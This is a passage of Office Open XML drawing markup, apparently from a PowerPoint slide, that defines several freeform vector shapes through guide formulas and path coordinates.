                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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00" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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01" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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3"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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02" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>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28"/>
                  <a:gd name="T41" fmla="*/ 31 w 31"/>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28">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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03" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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6"/>
                  <a:gd name="T64" fmla="*/ 0 h 72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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6" h="72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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04" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
